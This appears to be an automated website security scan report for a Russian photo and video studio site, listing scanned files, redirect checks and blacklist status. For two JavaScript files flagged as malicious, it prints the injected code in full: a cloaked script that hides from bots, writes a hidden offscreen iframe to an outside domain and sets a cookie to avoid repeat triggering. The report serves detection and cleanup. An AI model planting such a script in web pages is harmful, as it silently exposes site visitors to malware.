Scanned pages/files
Request | Server response | Status |
http://www.studio-ozon.ru/ | 200 OK Content-Length: 19494 Content-Type: text/html | clean |
http://www.studio-ozon.ru/media/system/js/caption.js | 200 OK Content-Length: 982 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["bots","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCookie("akelbriston19ure")===undefined);if(!d()&&c){document.write('<iframe width="112" height="132" style="position:absolute;margin-top:-1002px;" src="http://freediverindonesia.ga/luckyblock17.html"></iframe>');var a=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+a.toUTCString()}})();
Antivirus reports:
http://www.studio-ozon.ru/plugins/content/jw_allvideos/includes/js/behaviour.js | 200 OK Content-Length: 2246 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["bots","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCooki var responseContainer = []; window[jsonpCallback] = function(response){ responseContainer.tempId = [response]; }; var head = document.getElementsByTagName('head')[0]; var remotejson = this.getRemoteJson(el.url); head.appendChild(remotejson); remotejson.onload = function(){ document.getElementById(el.playerID).innerHTML = responseContainer.tempId[0].html; } } } ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Antivirus reports:
http://www.studio-ozon.ru/plugins/content/jw_allvideos/includes/js/mediaplayer/jwplayer.js | 200 OK Content-Length: 140107 Content-Type: application/javascript | clean |
http://www.studio-ozon.ru/plugins/content/jw_allvideos/includes/js/wmvplayer/silverlight.js | 200 OK Content-Length: 17901 Content-Type: application/javascript | clean |
http://www.studio-ozon.ru/plugins/content/jw_allvideos/includes/js/wmvplayer/wmvplayer.js | 200 OK Content-Length: 24010 Content-Type: application/javascript | clean |
http://www.studio-ozon.ru/plugins/content/jw_allvideos/includes/js/quicktimeplayer/AC_QuickTime.js | 200 OK Content-Length: 8527 Content-Type: application/javascript | clean |
http://counter.rambler.ru/top100.jcn?1617776 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://www.studio-ozon.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 1844 Content-Type: text/html | clean |
http://www.studio-ozon.ru/index.php | 200 OK Content-Length: 19499 Content-Type: text/html | clean |
http://www.studio-ozon.ru/videop | 200 OK Content-Length: 24064 Content-Type: text/html | clean |
http://www.studio-ozon.ru/foto | 200 OK Content-Length: 13322 Content-Type: text/html | clean |
http://www.studio-ozon.ru/fotostudio | 200 OK Content-Length: 12680 Content-Type: text/html | clean |
http://www.studio-ozon.ru/vipusk | 200 OK Content-Length: 12748 Content-Type: text/html | clean |
http://www.studio-ozon.ru/recklama | 200 OK Content-Length: 13968 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: studio-ozon.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: studio-ozon.ru
Referer: http://www.google.com/search?q=studio-ozon.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=studio-ozon.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://studio-ozon.ru/
Result: studio-ozon.ru is not infected or malware details are not published yet.